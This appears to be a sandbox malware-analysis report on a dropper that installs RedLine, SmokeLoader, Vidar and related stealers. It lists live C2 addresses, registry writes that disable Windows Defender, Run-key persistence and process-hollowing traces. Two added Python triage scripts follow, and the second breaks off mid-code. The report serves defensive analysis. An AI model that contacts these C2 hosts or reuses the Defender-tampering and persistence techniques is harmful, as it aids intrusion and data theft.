Overview

Score: 10 on the static task and on each of the eight behavioral tasks (three on windows7_x64, one on windows11_x64, four on windows10_x64).

Analysis
max time kernel: 1556s
max time network: 1809s
platform: windows11_x64
resource: win11
submitted: 28-09-2021 20:51

The signature detail below comes from this windows11_x64 run (behavioral4); every file and memory resource cited under Signatures carries the behavioral4/ prefix.
Tasks
static1: Static task
Behavioral tasks (sample for each: 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe)
behavioral1: resource win7-ja-20210920
behavioral2: resource win7v20210408
behavioral3: resource win7-de-20210920
behavioral4: resource win11
behavioral5: resource win10v20210408
behavioral6: resource win10-ja-20210920
behavioral7: resource win10-en-20210920
behavioral8: resource win10-de-20210920
General
Target: 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe (the file name is the upper-cased leading part of the SHA256)
Size: 3.9MB
MD5: 1be0d2741eaac6804e24a7586b1086b0
SHA1: cdb330156b2063c6f259cb10a787463756798f7a
SHA256: 071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9
SHA512: cc9352b0ace0a51cac07069adf33d98e548e6726e71bf4582dcb15c3d7b0a7806765ffc57f95511f1aeca798d7fbf44c08bc5ebe7bc13626b8b7bcd0df872f85
Malware Config

Extracted: redline
Botnet ID: 7.5k_Z_BOGOM
C2: 195.133.18.154:30491

Extracted: smokeloader
Version: 2020
C2 URLs:
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro. WmiPrvSE.exe is also the host process for WMI method calls, so any process in the chain that runs Win32_Process.Create over WMI produces exactly this parent/child pair without any exploit; check the other process-creation rows before reading it as exploitation.

description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4668 | 6452 | rundll32.exe | 234
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5724 | 6452 | rundll32.exe | 234
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (3 IoCs)
resource | yara_rule
behavioral4/files/0x000300000002b1d2-265.dat | family_redline
behavioral4/memory/6052-377-0x0000000000000000-mapping.dmp | family_redline
behavioral4/memory/3952-476-0x0000000005080000-0x0000000005698000-memory.dmp | family_redline

The two memory hits are in pids 6052 and 3952. Both are targets of SetThreadContext calls listed further down (from 6112 and 6080, each running the same image name as its target), so the RedLine payload is unpacked into a hollowed child copy of the dropper rather than executed from the dropped file as written to disk.
SmokeLoader
Modular backdoor trojan, in circulation since 2011.

Socelars Payload (1 IoC)
resource | yara_rule
behavioral4/files/0x000100000002b1e3-280.dat | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess (28 IoCs)
Process | pid | created pid | procid_target
WerFault.exe | 4660 | 3872 | 91
WerFault.exe | 5224 | 4544 | 96
WerFault.exe | 5296 | 1288 | 92
WerFault.exe | 4024 | 6040 | 122
WerFault.exe | 5460 | 6104 | 131
WerFault.exe | 3848 | 6088 | 133
WerFault.exe | 5780 | 4212 | 125
WerFault.exe | 1756 | 6028 | 276
WerFault.exe | 6016 | 5244 | 413
WerFault.exe | 6416 | 864 | 137
taskkill.exe | 6796 | 3012 | 147
WerFault.exe | 6664 | 1252 | 274
WerFault.exe | 7092 | 856 | 278
WerFault.exe | 3008 | 3240 | 354
WerFault.exe | 3268 | 1084 | 284
WerFault.exe | 3316 | 4968 | 287
WerFault.exe | 5748 | 3132 | 294
WerFault.exe | 452 | 5884 | 334
WerFault.exe | 3240 | 4452 | 277
WerFault.exe | 1232 | 2216 | 353
WerFault.exe | 6056 | 16204 | 383
WerFault.exe | 1088 | 6128 | 392
WerFault.exe | 3724 | 4032 | 405
WerFault.exe | 14488 | 13728 | 486
WerFault.exe | 15256 | 15136 | 525
WerFault.exe | 16368 | 1288 | 539
WerFault.exe | 3668 | 5152 | 542
WerFault.exe | 2100 | 7816 | 559

27 of the 28 rows belong to WerFault.exe, and with one exception (6028, which is itself the dropped WerFault.exe) every created pid reappears as a crashed pid in the Program crash table at the end of this report; these rows are crash-reporting activity, not injection. The row worth attention is taskkill.exe (6796) against 3012, the dropped zb9d5srca1S85UfvPFnTAZJd.exe, which also shows up as a crashed process.
Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
Process | pid | created pid | procid_target
svchost.exe | 6000 | 4432 | 189
svchost.exe | 6000 | 4432 | 189
svchost.exe | 6000 | 13836 | 487
svchost.exe | 6000 | 13836 | 487

Pid 4432 is the dropped AdvancedRun.exe (see Executes dropped EXE).
Turns off Windows Defender SpyNet reporting (2 TTPs)

Arkei Stealer Payload (1 IoC)
resource | yara_rule
behavioral4/memory/3200-473-0x0000000000400000-0x000000000047C000-memory.dmp | family_arkei

Pid 3200 is rPRLfhZmwXu3oXGQaqju2XrO.exe in the Executes dropped EXE list.

Checks for common network interception software (1 TTP)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (3 IoCs)
resource | yara_rule
behavioral4/memory/1288-220-0x0000000002710000-0x00000000027AD000-memory.dmp | family_vidar
behavioral4/memory/6040-417-0x00000000031B0000-0x0000000003284000-memory.dmp | family_vidar
behavioral4/memory/6104-439-0x0000000000E90000-0x0000000000F64000-memory.dmp | family_vidar

Pids 1288, 6040 and 6104 are Thu02966ca5c58f270.exe, ROALiWFsQQ6znKzS1XQ1Yxhu.exe and 8Ax8th0v3UP0xwWMPp2QiY_N.exe respectively; all three are later listed as crashed processes. Vidar is a fork of Arkei, so family_arkei and family_vidar rules commonly fire on closely related builds.

ASPack 2.12-2.42 packer (yara rule aspack_v212_v242, 6 IoCs)
resource | yara_rule
behavioral4/files/0x000200000002b1aa-151.dat | aspack_v212_v242
behavioral4/files/0x000200000002b1ac-150.dat | aspack_v212_v242
behavioral4/files/0x000200000002b1ac-155.dat | aspack_v212_v242
behavioral4/files/0x000200000002b1aa-152.dat | aspack_v212_v242
behavioral4/files/0x000100000002b1b2-156.dat | aspack_v212_v242
behavioral4/files/0x000100000002b1b2-159.dat | aspack_v212_v242
Blocklisted process makes network request (50 IoCs)
Process (pid) | flows
msiexec.exe (5244) | 84, 91, 105, 108, 114, 119, 122
powershell.exe (4892) | 150
cmd.exe (6176) | 159, 171
MsiExec.exe (5772) | 325, 327, 328, 329, 330, 332, 333, 334, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 361, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373

cmd.exe (6176) is listed under Executes dropped EXE and is the SetThreadContext target of A5SgmahwE9hpMlGs6aKgdDtn.exe (864), so its two flows should be attributed to the injected code, not to an interactive shell.
Downloads MZ/PE file

Drops file in Drivers directory (1 IoC)
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Sharefolder.exe

A dropped binary writing the hosts file usually redirects or blocks name resolution for chosen domains; on a live host, diff the file against a clean copy before trusting any DNS-based telemetry collected from that machine.
Executes dropped EXE (64 IoCs)
pid | Process
4344 | setup_install.exe
3256 | Thu02483b39590da5492.exe
784 | Thu0247e977c7950492a.exe
4544 | Thu0299d0d70a4d322.exe
1288 | Thu02966ca5c58f270.exe
1260 | Thu02d385ff55.exe
3872 | Thu02588bdad8e7.exe
4644 | Thu02f60acc90a3.exe
2548 | Thu02c015332704.exe
4652 | Thu02bfe1521bcc038.exe
4812 | Thu0247e977c7950492a.exe
5400 | Riconobbe.exe.com
5476 | Riconobbe.exe.com
6028 | WerFault.exe
6040 | ROALiWFsQQ6znKzS1XQ1Yxhu.exe
6080 | hDp_Q0M7VwC0FF7WWvUBtdbN.exe
6120 | 4UFxWlf4SXw8gZe000f3mxr3.exe
6088 | YCX7g7FDRa0n1vrcJtVZ_H9d.exe
6112 | W455uTSoUtq8LXiwXO1kYBjY.exe
6104 | 8Ax8th0v3UP0xwWMPp2QiY_N.exe
6128 | gcleaner.exe
4708 | CiDdAOtOAfGTjMtFrybZvGVz.exe
6096 | vsvchNX79eSDzY6jf6F89_MI.exe
4212 | _Uqo5UP9ZDxv2KDF87j1qJ5Q.exe
5156 | 8Fb4EkT85lFegSzJ2GCDrw_Z.exe
6136 | vefp3cTczsHP35rf3STZwLUJ.exe
5092 | H6KBNe4YRhkCjXl_yzSBZb2I.exe
864 | A5SgmahwE9hpMlGs6aKgdDtn.exe
3560 | HDnlha8KQxoi8bwvnS6xlPp4.exe
5244 | msiexec.exe
3012 | zb9d5srca1S85UfvPFnTAZJd.exe
4412 | d6VXIVqi2MqlNOaKIT8CawaY.exe
5544 | PGyDws9ux3Lc9PjIedgVt2AC.exe
4028 | aclfGgw26YHyfrb3n9JONFow.exe
5048 | jDVhr13u5N750xam3eOI1eNW.exe
4292 | aOiJ03mSE4lRy3Tw5uB0q43R.exe
5564 | byxb49tCEP1SdejWYr15WvcH.exe
3200 | rPRLfhZmwXu3oXGQaqju2XrO.exe
1868 | oKmnOrVPGDoDvSbzfd3Aw8I1.exe
5680 | Install.exe
5396 | 210921.exe
5796 | Conhost.exe
6024 | 269new.exe
6052 | W455uTSoUtq8LXiwXO1kYBjY.exe
4688 | hDp_Q0M7VwC0FF7WWvUBtdbN.exe
3912 | Install.exe
5112 | 2841347.scr
1248 | 5964929.scr
4432 | AdvancedRun.exe
3952 | hDp_Q0M7VwC0FF7WWvUBtdbN.exe
3060 | 7725650.scr
1436 | extd.exe
2424 | 5030357.scr
5140 | 1.exe
5852 | msedge.exe
5828 | 3783178.scr
5112 | 2841347.scr (listed a second time)
1248 | 5964929.scr (listed a second time)
3504 | WinHoster.exe
6176 | cmd.exe
6772 | qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
2824 | Conhost.exe
4276 | Lukykutufu.exe
4588 | E804.exe

Several dropped files reuse the names of legitimate Windows binaries (WerFault.exe, Conhost.exe, cmd.exe, msiexec.exe, msedge.exe). Where those names appear in the other tables with one of the pids above (for example Conhost.exe 2824 under SetThreadContext, or cmd.exe 6176 under network requests), the row refers to the dropped copy, not to the system binary.
Stops running service(s) (3 TTPs)

Checks BIOS information in registry (2 TTPs, 28 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Key values queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion and \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Both values queried by (13 processes, 26 rows): CiDdAOtOAfGTjMtFrybZvGVz.exe, vefp3cTczsHP35rf3STZwLUJ.exe, gcleaner.exe, H6KBNe4YRhkCjXl_yzSBZb2I.exe, byxb49tCEP1SdejWYr15WvcH.exe, 269new.exe, 2841347.scr, 2F8F.exe, 3783178.scr, vsvchNX79eSDzY6jf6F89_MI.exe, 210921.exe, 4UFxWlf4SXw8gZe000f3mxr3.exe, 9295.exe
SystemBiosVersion only (2 rows): Install.exe
Drops startup file (1 IoC)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netoptimize.lnk | disksyncer.exe

Loads dropped DLL (64 IoCs, grouped; count of loads in parentheses)
pid | Process
4344 | setup_install.exe (6)
4028 | aclfGgw26YHyfrb3n9JONFow.exe (1)
3200 | rPRLfhZmwXu3oXGQaqju2XrO.exe (1)
6880 | 47DB.exe (1)
5976 | 4azU_c07QucZGrH2hrEOw9YR.tmp (1)
2128, 5884, 4152, 4032, 10868, 10884 | rundll32.exe (1 each)
16248 | installer.exe (4)
2868 | autosubplayer.exe (25)
2172 | MsiExec.exe (2)
5772 | MsiExec.exe (13)
4144 | MsiExec.exe (2)
12172 | lighteningplayer-cache-gen.exe (2)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Themida packer (yara rule themida, 11 IoCs)
resource | yara_rule
behavioral4/files/0x000100000002b1e4-266.dat | themida
behavioral4/files/0x000200000002b1ce-255.dat | themida
behavioral4/files/0x000200000002b1d9-262.dat | themida
behavioral4/files/0x000300000002b1ca-261.dat | themida
behavioral4/files/0x000100000002b1e6-260.dat | themida
behavioral4/files/0x000200000002b1cf-268.dat | themida
behavioral4/memory/6096-321-0x0000000000D70000-0x0000000000D71000-memory.dmp | themida
behavioral4/memory/6136-337-0x00000000008D0000-0x00000000008D1000-memory.dmp | themida
behavioral4/memory/6128-335-0x00000000007E0000-0x00000000007E1000-memory.dmp | themida
behavioral4/memory/6120-331-0x0000000000420000-0x0000000000421000-memory.dmp | themida
behavioral4/memory/5092-342-0x0000000000EE0000-0x0000000000EE1000-memory.dmp | themida

The memory hits are vsvchNX79eSDzY6jf6F89_MI.exe (6096), vefp3cTczsHP35rf3STZwLUJ.exe (6136), gcleaner.exe (6128), 4UFxWlf4SXw8gZe000f3mxr3.exe (6120) and H6KBNe4YRhkCjXl_yzSBZb2I.exe (5092), all of which also appear in the BIOS-check and HideFromDebugger tables.

Windows Defender settings modified in the registry (11 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | A5SgmahwE9hpMlGs6aKgdDtn.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | A5SgmahwE9hpMlGs6aKgdDtn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | A5SgmahwE9hpMlGs6aKgdDtn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | A5SgmahwE9hpMlGs6aKgdDtn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | A5SgmahwE9hpMlGs6aKgdDtn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | A5SgmahwE9hpMlGs6aKgdDtn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe = "0" | A5SgmahwE9hpMlGs6aKgdDtn.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | A5SgmahwE9hpMlGs6aKgdDtn.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | A5SgmahwE9hpMlGs6aKgdDtn.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | A5SgmahwE9hpMlGs6aKgdDtn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1CCA.exe = "0" | 1CCA.exe

All of these writes land under HKLM\SOFTWARE\WOW6432Node, the 32-bit registry view that a 32-bit process is redirected into. The 64-bit Defender service reads its configuration from the native view, and with tamper protection enabled the Real-Time Protection, Spynet and Features values cannot be changed by a third-party process at all, so these rows document intent rather than effect; on a real host confirm the effective state with Get-MpPreference and Get-MpComputerStatus before concluding that real-time monitoring was disabled.
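The registry rows in this report (the BIOS-version queries, the Run keys, the AV check and the Windows Defender writes above) are rendered as one run-together line per signature, which is awkward to pivot on. The script below is an added example, not part of the original report: it splits such a line at the sandbox's action keywords, parses each row into action, key, value and process, and tags each process with the behaviour its rows evidence. The sample input is a constructed subset copied from the tables on this page; the tag names (defender_tamper, defender_exclusion, bios_query, run_key_persistence) and the function names are this script's own.

```python
"""Parse flattened registry IoC rows from a sandbox report and classify them.

Added example, not code from the original report. SAMPLE_ROWS is a constructed
subset of the report's registry rows, run together on one line exactly as the
report renders them; the tag names below are this script's own.
"""
import re
from collections import defaultdict

# Action keywords the report uses at the start of every registry row.
ACTIONS = r"Key created|Key opened|Key value queried|Set value \((?:int|str)\)"

# Constructed sample input (rows copied from this report, joined by single spaces).
SAMPLE_ROWS = (
    r'Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths A5SgmahwE9hpMlGs6aKgdDtn.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" A5SgmahwE9hpMlGs6aKgdDtn.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" A5SgmahwE9hpMlGs6aKgdDtn.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" A5SgmahwE9hpMlGs6aKgdDtn.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe = "0" A5SgmahwE9hpMlGs6aKgdDtn.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1CCA.exe = "0" 1CCA.exe '
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CiDdAOtOAfGTjMtFrybZvGVz.exe '
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CiDdAOtOAfGTjMtFrybZvGVz.exe '
    r'Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5030357.scr '
    r'Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe'
)

# Key suffix (lower-case) -> value that indicates Defender is being weakened.
DEFENDER_KILL_SWITCHES = {
    "\\real-time protection\\disablerealtimemonitoring": "1",
    "\\spynet\\spynetreporting": "0",
    "\\spynet\\submitsamplesconsent": "0",
    "\\features\\tamperprotection": "0",
}


def split_rows(text):
    """Split the run-together text at every action keyword that starts a row."""
    return re.split(rf"\s+(?=(?:{ACTIONS}) )", text.strip())


def parse_row(chunk):
    """Return {'action', 'key', 'value', 'process'} for one row ('value' only for Set value)."""
    m = re.match(rf"^({ACTIONS}) (.*)$", chunk, re.S)
    if not m:
        raise ValueError(f"unrecognised row: {chunk!r}")
    action, rest = m.group(1), m.group(2)
    if action.startswith("Set value"):
        # Form: <key> = "<value>" <process>; keys may contain spaces, processes do not.
        key, _, tail = rest.partition(' = "')
        value, _, process = tail.rpartition('" ')
        return {"action": action, "key": key, "value": value, "process": process}
    key, process = rest.rsplit(None, 1)
    return {"action": action, "key": key, "value": None, "process": process}


def parse_registry_rows(text):
    return [parse_row(chunk) for chunk in split_rows(text)]


def classify(row):
    """Tag one parsed row with the behaviours it evidences."""
    key = row["key"].lower()
    is_write = row["action"].startswith("Set value")
    tags = set()
    if "\\windows defender\\" in key:
        if is_write and "\\exclusions\\paths\\" in key:
            tags.add("defender_exclusion")
        for suffix, bad_value in DEFENDER_KILL_SWITCHES.items():
            if key.endswith(suffix) and row["value"] == bad_value:
                tags.add("defender_tamper")
    if key.startswith("\\registry\\machine\\hardware\\description\\system\\") and key.endswith("biosversion"):
        tags.add("bios_query")
    if is_write and ("\\currentversion\\run\\" in key or "\\currentversion\\runonce\\" in key):
        tags.add("run_key_persistence")
    return tags


def summarize(rows):
    """Map each process name to the union of tags over all of its rows."""
    by_process = defaultdict(set)
    for row in rows:
        by_process[row["process"]] |= classify(row)
    return dict(by_process)


def defender_tampering_processes(summary):
    """Processes with any Defender-related tag, sorted for stable output."""
    return sorted(p for p, tags in summary.items() if any(t.startswith("defender_") for t in tags))


if __name__ == "__main__":
    for process, tags in sorted(summarize(parse_registry_rows(SAMPLE_ROWS)).items()):
        print(f"{process:32} {', '.join(sorted(tags)) or '-'}")
```

Run as-is it prints one line per process with its tags; feeding it the full text of a signature table instead of SAMPLE_ROWS gives the same per-process view for the whole report. The key-suffix match is deliberately independent of the WOW6432Node prefix, so the same rule catches both the redirected writes seen here and native 64-bit writes.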
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application (2 TTPs, 8 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | disksyncer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\main_signed1.exe = "C:\ProgramData\main_signed1.\main_signed1.exe" | disksyncer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\DebasedSeptenary_2021-09-28_19-42.exe = "C:\Users\Admin\AppData\Local\Temp\DebasedSeptenary_2021-09-28_19-42.\DebasedSeptenary_2021-09-28_19-42.exe" | disksyncer.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | Thu02bfe1521bcc038.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"" | Thu02bfe1521bcc038.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe" | 5030357.scr
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = ""C:\Program Files (x86)\Microsoft.NET\Hawemipemo.exe"" | Sharefolder.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe

The wextract_cleanup0 entry is the standard RunOnce cleanup value that the Windows wextract/IExpress self-extractor writes for its IXP000.TMP working directory, so Thu02bfe1521bcc038.exe is an IExpress-style package rather than hand-written persistence. The persistence that matters is the rest: WinHoster.exe (dropped, pid 3504) under the user's Run key, Hawemipemo.exe under HKLM RunOnce, the two disksyncer.exe entries plus its Startup-folder netoptimize.lnk, and a Run key opened by the dropped msedge.exe (5852).

Checks for any installed AV software in registry (1 TTP, 1 IoC)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Queries the EnableLUA policy value (13 IoCs)
Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Processes: 2F8F.exe, gcleaner.exe, vsvchNX79eSDzY6jf6F89_MI.exe, 4UFxWlf4SXw8gZe000f3mxr3.exe, vefp3cTczsHP35rf3STZwLUJ.exe, 3783178.scr, 2841347.scr, H6KBNe4YRhkCjXl_yzSBZb2I.exe, byxb49tCEP1SdejWYr15WvcH.exe, 210921.exe, 269new.exe, CiDdAOtOAfGTjMtFrybZvGVz.exe, 9295.exe

EnableLUA is the UAC on/off policy. These thirteen processes are exactly the thirteen that query both BIOS version values above (Install.exe is the only BIOS checker missing here), and several of them carry themida hits, which is consistent with one packed stub shared across these droppers.
Enumerates connected drives (3 TTPs, 64 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
File opened (read-only), grouped by process:
msiexec.exe (39 opens, several letters opened more than once): \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Z:
installer.exe (13 opens): \??\A: \??\E: \??\G: \??\H: \??\I: \??\J: \??\L: \??\M: \??\N: \??\P: \??\U: \??\V: \??\X:
3C3A.exe (11 opens): \??\E: \??\F: \??\G: \??\N: \??\O: \??\P: \??\S: \??\T: \??\W: \??\Y: \??\Z:
Install.exe (1 open): \??\Z:

52 of the 64 opens come from msiexec.exe and installer.exe while Windows Installer packages are being processed, which is ordinary installer behaviour; the sweep by 3C3A.exe is the one that deserves a second look.
Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (5 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
1 | ipinfo.io
11 | ip-api.com
27 | ipinfo.io
89 | ipinfo.io
155 | ipinfo.io

Drops file in System32 directory (6 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe

Registry.pol under GroupPolicy\Machine is the local machine Group Policy store and gpt.ini holds its version counter; creating the former and rewriting the latter is how a local policy change is made to apply at the next policy refresh. When triaging the host, read the dropped Registry.pol to see which policies were set rather than relying on the registry alone.
Suspicious use of NtSetInformationThreadHideFromDebugger (49 IoCs, grouped)
pid | Process
6096 | vsvchNX79eSDzY6jf6F89_MI.exe
6120 | 4UFxWlf4SXw8gZe000f3mxr3.exe
6136 | vefp3cTczsHP35rf3STZwLUJ.exe
5048 | jDVhr13u5N750xam3eOI1eNW.exe (multiple calls)
6128 | gcleaner.exe
5092 | H6KBNe4YRhkCjXl_yzSBZb2I.exe
5564 | byxb49tCEP1SdejWYr15WvcH.exe
5396 | 210921.exe
6024 | 269new.exe
5828 | 3783178.scr
5112 | 2841347.scr
864 | A5SgmahwE9hpMlGs6aKgdDtn.exe (multiple calls)
4708 | CiDdAOtOAfGTjMtFrybZvGVz.exe
6036 | 2F8F.exe
5668 | 9295.exe
13728 | 1CCA.exe (multiple calls)

A5SgmahwE9hpMlGs6aKgdDtn.exe (864) and 1CCA.exe (13728) account for most of the 49 rows; they are also the two processes that write the Windows Defender settings listed above.
Suspicious use of SetThreadContext (10 IoCs)
description | pid | Process | procid_target
PID 6112 set thread context of 6052 | 6112 | W455uTSoUtq8LXiwXO1kYBjY.exe | 167
PID 4292 set thread context of 5112 | 4292 | aOiJ03mSE4lRy3Tw5uB0q43R.exe | 205
PID 6080 set thread context of 3952 | 6080 | hDp_Q0M7VwC0FF7WWvUBtdbN.exe | 182
PID 864 set thread context of 6176 | 864 | A5SgmahwE9hpMlGs6aKgdDtn.exe | 318
PID 2824 set thread context of 4588 | 2824 | Conhost.exe | 254
PID 4276 set thread context of 2392 | 4276 | Lukykutufu.exe | 259
PID 6880 set thread context of 1180 | 6880 | 47DB.exe | 272
PID 6096 set thread context of 6920 | 6096 | vsvchNX79eSDzY6jf6F89_MI.exe | 297
PID 1604 set thread context of 6888 | 1604 | tmp7B8A_tmp.exe | 317
PID 13728 set thread context of 14344 | 13728 | 1CCA.exe | 514

Setting the thread context of another process is the step that redirects execution in process hollowing. Resolving the targets through the Executes dropped EXE list: 6052 and 3952 carry the same image names as their parents (W455uTSoUtq8LXiwXO1kYBjY.exe and hDp_Q0M7VwC0FF7WWvUBtdbN.exe) and are the two pids with RedLine memory hits; 5112 is 2841347.scr; 6176 is the dropped cmd.exe; 4588 is E804.exe, written by the dropped Conhost.exe (2824). The remaining targets (2392, 1180, 6920, 6888, 14344) are not listed under Executes dropped EXE, so their image names cannot be recovered from this report.
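The pivot described above, from a SetThreadContext row to the target's image name and to the YARA families found in its memory, is mechanical and worth scripting when a report has more than a handful of rows. The block below is an added example, not code from the original report: it parses the SetThreadContext rows, maps target pids through the dropped-EXE list, and attaches the family rules whose memory-dump resource names encode the same pid. The embedded rows are a constructed subset copied from this report's SetThreadContext, Executes dropped EXE and payload tables; the function and field names are this script's own.

```python
"""Correlate SetThreadContext rows with dropped-EXE pids and YARA memory hits.

Added example, not code from the original report. The data below is a constructed
subset of the report's tables; field names are this script's own.
"""
import re

# Rows copied from 'Suspicious use of SetThreadContext', run together as the report renders them.
SET_THREAD_CONTEXT_ROWS = (
    "PID 6112 set thread context of 6052 6112 W455uTSoUtq8LXiwXO1kYBjY.exe 167 "
    "PID 4292 set thread context of 5112 4292 aOiJ03mSE4lRy3Tw5uB0q43R.exe 205 "
    "PID 6080 set thread context of 3952 6080 hDp_Q0M7VwC0FF7WWvUBtdbN.exe 182 "
    "PID 864 set thread context of 6176 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 318 "
    "PID 2824 set thread context of 4588 2824 Conhost.exe 254"
)

# pid -> image name, from 'Executes dropped EXE' (subset).
DROPPED_EXE = {
    6112: "W455uTSoUtq8LXiwXO1kYBjY.exe", 6052: "W455uTSoUtq8LXiwXO1kYBjY.exe",
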